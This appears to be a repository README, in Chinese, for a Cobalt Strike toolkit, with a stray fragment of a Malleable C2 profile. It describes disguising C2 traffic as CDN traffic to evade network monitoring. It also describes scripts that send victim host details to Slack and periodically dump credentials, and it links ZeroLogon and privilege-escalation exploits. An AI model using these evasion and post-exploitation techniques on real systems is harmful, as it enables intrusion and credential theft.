Here's a variant http-get block named "My Variant": 613 | ## http-get "My Variant" { 614 | ## client { 615 | ## parameter "bar" "blah"; 616 | 617 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## 1135-CobaltStrike-ToolKit 2 | 3 | ### Malleable C2 Files 4 | 5 | Cobalt Strike的Malleable C2配置文件,被设计用来对抗流量分析。 6 | 7 | Cobalt Strike的Malleable C2配置文件,定义了 victim 与 团队服务器 之间的C2通信流量的“通信格式规范和方式”。 8 | 9 | 通过将C2流量伪装成"正常流量"。以避免直接被NIDS、SOC系统识别为异常流量,可能迷惑安全运营人员。 10 | 11 | 12 | 具体说明 13 | 14 | |Malleable C2 profile|cs version|描述| 15 | |:-----:|--|--| 16 | |jquery.xxx.js_CN_cdn.bootcss.com_for_cs3.14_.txt|3.12 3.14|伪装成正常HTTP流量: 浏览器与web服务器之间的流量. | 17 | |jquery.xxx.js_code.bootcdn.net_for_cs4.0_.txt| 4.0 | 伪装成正常HTTP流量: 浏览器与web服务器之间的流量. | 18 | 19 | 建议自行修改 Malleable C2 profile. 20 | 21 | * 其他参考 22 | * [APT级的全面免杀与企业纵深防御体系的对抗 - 先知社区](https://xz.aliyun.com/t/4191) 23 | * https://github.com/threatexpress/malleable-c2 24 | 25 | --- 26 | 27 | ### AggressorScripts 28 | 29 | AggressorScripts - 修改或扩展Cobalt Strike 3.* 的客户端功能(可实现自定义菜单创建,日志记录,权限维持等)。 30 | 31 | 更多参考官方介绍[Aggressor Script Tutorial and Reference](https://www.cobaltstrike.com/aggressor-script/index.html) 32 | 33 | 具体说明 34 | 35 | |filename|opsec|desc|demo| 36 | |:-----:|--|------|-------| 37 | |BeaconNote.cna|1|某个Beacon首次上线时 设置这个Beacon的note为`Beacon ID + 首次上线时间` |`bid: 86985 Established: 11/13/2019 16:50:19 (CST)`| 38 | |BeaconNotify.cna|1|某个Beacon首次上线时 将这个Beacon的完整信息都发送到指定的Slack Channel [配置你的Slack webhooks](https://api.slack.com/messaging/webhooks)|`host/User/beaconID/os/ver/PID/external IP/internal IP...`| 39 | |LoopDo.cna|0|每隔x分钟执行一次操作 | 按时执行 自定义cmd命令/屏幕截图/logonpasswords/...| 40 | 41 | 42 | #### 补充说明 43 | 44 | teamserver服务器日志 - 文件夹`cobaltstrike/logs/{date}/{ip}` 45 | 46 | |Log Type|ext|location| 47 | |:-----:|-|------------| 48 | |Beacon命令行 所有内容|.log|`/cobaltstrike/logs/191107/10.10.13.19/becon_71256.log`| 49 
| |屏幕截图|.jpg|`/cobaltstrike/logs/191107/10.10.13.19/screenshots/screen_050658_87924.jpg`| 50 | 51 | 52 | #### Others 53 | 54 | |author/filename|opsec|desc|demo| 55 | |:-----:|--|------|-------| 56 | | [Cobalt Strike ZeroLogon-BOF](https://github.com/rsmudge/ZeroLogon-BOF) | ? | ZeroLogon CVE-2020-1472 | 57 | | [outflanknl/Ps-Tools](https://github.com/outflanknl/Ps-Tools) PS-Tools.cna | ? | 列出进程的详细信息 |5种命令`psx psk psc psm psh psw` | 58 | | https://github.com/rsmudge/ElevateKit | ? | [官方推荐](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/post-exploitation_privilege-escalation.htm?Highlight=ElevateKit) 多个较新的提权漏洞exp. 版本要求: for Cobalt Strike 3.6 and later. | | 59 | --------------------------------------------------------------------------------